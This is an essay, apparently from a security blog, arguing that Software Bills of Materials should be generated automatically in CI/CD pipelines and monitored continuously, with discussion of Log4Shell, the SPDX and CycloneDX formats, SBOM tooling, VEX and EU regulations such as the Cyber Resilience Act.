The question is simple: what software is actually running in your systems? Not what you think is running, not what the deployment manifest says, but what is really there, compiled, linked, packaged, and shipped. For most organizations, the honest answer remains that they are not entirely sure.

That gap between what teams believe they’re shipping and what is actually inside a software artifact is where attackers have been living for years. SolarWinds turned it into a geopolitical incident. Log4Shell turned it into a week of emergency all-hands meetings for a large part of the industry. Yet even after those events, many teams still cannot produce a reliable, complete, up-to-date inventory of their software components on demand.

SBOM (Software Bill of Materials) answers that question. When it is treated only as a compliance artifact, the real value is missed.

The lesson nobody really learned from Log4Shell

When CVE-2021-44228 dropped on December 9, 2021, with a CVSS score of 10.0, the response across the industry was instant panic followed by exhausting confusion. Not because the vulnerability was hard to understand, an attacker could trigger remote code execution by injecting a crafted string that Log4j2 would blindly evaluate via JNDI, but because nobody knew where Log4j2 was hiding.

It was everywhere. It was inside Elasticsearch, Logstash, Kafka, VMware products, Cisco software, Fortinet, dozens of SaaS platforms. It was not in the first layer of dependencies that developers think about, but in the transitive dependencies: the libraries that your libraries pull in, which in turn pull in other libraries, until the graph extends to hundreds of nodes for a medium-sized application. Organizations that had no inventory spent weeks running queries, asking vendors uncomfortable questions, and improvising. Organizations with good tooling and automated inventory answered within hours.

The Log4Shell response became, effectively, a live benchmark for software supply chain maturity. Those who passed it had invested in visibility. Those who failed were still operating on trust and assumption.

That is the real reason SBOM matters, not because a regulation says so, but because the next Log4Shell is coming and the window between disclosure and active exploitation keeps shrinking.

What an SBOM actually is (and what it is not)

An SBOM is a machine-readable inventory of the components that make up a software artifact. Every library, every module, every dependency pulled from a package registry or embedded at build time: each one represented with enough metadata to identify it precisely and correlate it against vulnerability databases and license records. The NTIA minimum elements, defined in 2021 as part of the implementation of Executive Order 14028, set the baseline: supplier name, component name, version, a unique identifier such as a Package URL or CPE, the dependency relationship, the SBOM author, and a timestamp.

What an SBOM is not is a pom.xml or a requirements.txt. Those files declare the dependencies a developer intended to include at the time they wrote the manifest. The actual compiled binary or container image often tells a different story, especially when build tools resolve version ranges, when indirect dependencies get bundled, or when base images carry components the application team never explicitly chose. A proper SBOM is generated from the artifact itself, not from the source declaration, and that distinction changes both the tooling and the workflow required to produce it.

It also is not a snapshot you generate once for a compliance audit. A component that was clean at release may develop a critical vulnerability six months later. If the SBOM lives in a folder somewhere and nobody is watching it against updated intelligence, it provides the same operational value as a smoke detector with a dead battery.

Two formats, one pragmatic choice

The two dominant SBOM formats today are SPDX, maintained by the Linux Foundation and standardized as ISO/IEC 5962:2021, and CycloneDX, developed by OWASP. Both are recognized by NTIA. Both cover the minimum required fields. The practical difference lies in focus.

SPDX has deeper roots in license compliance and open source governance. Its version 3.0, released in April 2024, extends the model beyond software to cover hardware, AI components, and build systems. CycloneDX is designed for security workflows: it has native support for VEX, Vulnerability Exploitability eXchange, which lets producers tell consumers not just what components are present but whether a given vulnerability is actually exploitable in a specific deployment context.

In most DevSecOps pipelines today, CycloneDX tends to be the more natural choice when the goal is vulnerability management integration. SPDX tends to be preferred when open source license compliance is the primary concern, or when a procurement or certification process requires the ISO standard explicitly. For organizations that need both, the good news is that the tooling can usually produce either format from the same analysis.

The toolchain that actually works

The open source ecosystem around SBOM generation has matured significantly since the Log4Shell moment. Syft, by Anchore, is one of the most widely used generators: it works across container images, filesystems, and OCI artifacts, covering a broad range of language ecosystems from Java and JavaScript to Go, Rust, and .NET. It integrates naturally with Grype, the Anchore vulnerability scanner, which consumes SBOM output and correlates it against sources including the NVD, GitHub Security Advisories, and distribution security notices.

Trivy, by Aqua Security, takes a broader approach: it is a combined vulnerability scanner and SBOM generator that handles container images, Git repositories, Kubernetes workloads, and Infrastructure as Code files, making it a convenient single tool for teams that want coverage across the stack. cdxgen, the official CycloneDX generator from OWASP, stands out for the depth of its analysis in Java and JavaScript ecosystems and for its ability to work from source code without requiring a compiled artifact.

For enterprise build environments, Microsoft SBOM Tool offers integration with heterogeneous build systems and Azure DevOps pipelines and supports both SPDX and CycloneDX output.

No tool solves the problem alone. Output quality depends on how well the tool understands the build system, how the artifact is packaged, and how the analysis is configured. Firmware and embedded systems remain genuinely hard: tools like Binwalk can extract and analyze firmware images, but the results still require manual validation and domain expertise that most application security teams do not have.

The CI/CD integration question is the real question

Generating an SBOM once is trivial. The harder engineering problem is keeping it accurate over time, tied to every release, and actually consumed by something that can act on it.

A production workflow worth the name generates the SBOM automatically at build time, from the compiled artifact, signs it cryptographically with Sigstore/Cosign so its integrity can be verified later, and stores it versioned alongside the release artifact. In container environments, the SBOM can be attached directly to the OCI image as an attestation, following the SLSA framework specifications, which is a clean approach because the inventory travels with the artifact wherever it goes.

The continuous monitoring piece is where most implementations fall short. New vulnerabilities appear after release, not before, and a static SBOM that nobody is watching against updated databases provides no operational value. Dependency-Track, the OWASP project for continuous SBOM management, solves this reasonably well: it ingests SBOM files via API, keeps them correlated against multiple vulnerability sources, and generates alerts when newly published CVEs match components already in inventory. Connecting those alerts to a ticketing system transforms the SBOM from a document into an operational feed.

The VEX workflow closes the loop. In any real environment, a significant fraction of the vulnerabilities that scanners flag are not exploitable given the specific deployment context: the vulnerable code path is not reachable, the affected feature is disabled, or there is a compensating control in place. VEX documents let the producing team communicate this context to downstream consumers, reducing noise and letting response efforts concentrate on what is actually dangerous. CISA has been pushing VEX adoption as a complementary mechanism to SBOM, and CycloneDX supports it natively.

The regulatory push and why it is not entirely the enemy

The Cyber Resilience Act, published in the Official Journal of the EU on November 20, 2024 as Regulation 2024/2847, makes SBOM a documented requirement for products with digital elements sold on the European market. Vulnerability notification obligations apply from September 2026, full compliance from December 2027. The regulation requires manufacturers to document components and vulnerabilities in a machine-readable format covering at least first-level dependencies, and to make that documentation available to market surveillance authorities on request.

The nuance worth noting: the CRA does not require public disclosure of the SBOM. It requires availability to regulators. This is meaningful for manufacturers who have legitimate confidentiality concerns about exposing their full software stack to competitors, but it also means the document remains functional even if it is never published.

NIS2 and DORA reinforce the picture from different angles: NIS2 requires essential and important entities to manage supply chain software risk, while DORA imposes specific controls on technology dependencies for financial institutions. For organizations building software for multiple regulated markets, the SBOM is becoming a baseline deliverable, not a discretionary activity.

This regulatory pressure should be read as validation for investments that were overdue. As I noted in a recent post on vulnerability management, most security programs do not fail for lack of tools but for lack of context. Patch volumes are enormous, scanner output is noisy, and teams too often optimize for metrics that look good on a dashboard instead of for actual resilience. A well-maintained SBOM provides the missing context layer: it connects a vulnerability report to a specific artifact, a specific release, a specific deployment and the team responsible for the decision.

What the compliance-first approach gets wrong

The failure mode to avoid is treating SBOM generation as a documentation exercise. An SBOM that is generated manually by the security team before a product release, dropped into a shared folder, and never touched again is almost worse than no SBOM, because it creates a false sense of coverage.

The same logic applies to vendor-provided SBOMs. As supply chain obligations cascade downstream, more organizations will start requesting SBOMs from their software suppliers. Receiving a CycloneDX file from a vendor is only useful if you have a process to ingest it, validate its quality, monitor it against current vulnerability intelligence, and track its updates across releases. Otherwise it is just another document in a compliance archive.

The operational maturity question is not “do we have an SBOM?” It is “do we know, right now, which deployed artifacts contain a component that appeared in yesterday’s CVE feed?” If the answer requires manual work, the pipeline is not finished yet.

As I wrote before in the context of container image security, the supply chain threat is not theoretical. Attackers are actively targeting the build and distribution layer, and the organizations that get hit hardest are those that inherited implicit trust in their software stack without ever verifying it. An SBOM program, built into the CI/CD pipeline and monitored continuously, is one of the most direct investments in making that implicit trust explicit and verifiable.

The regulation is pushing in the right direction. The tooling is mature enough to get started. The remaining question is whether security teams will use the compliance deadline as a forcing function to build something actually useful, or just generate enough documentation to satisfy an audit.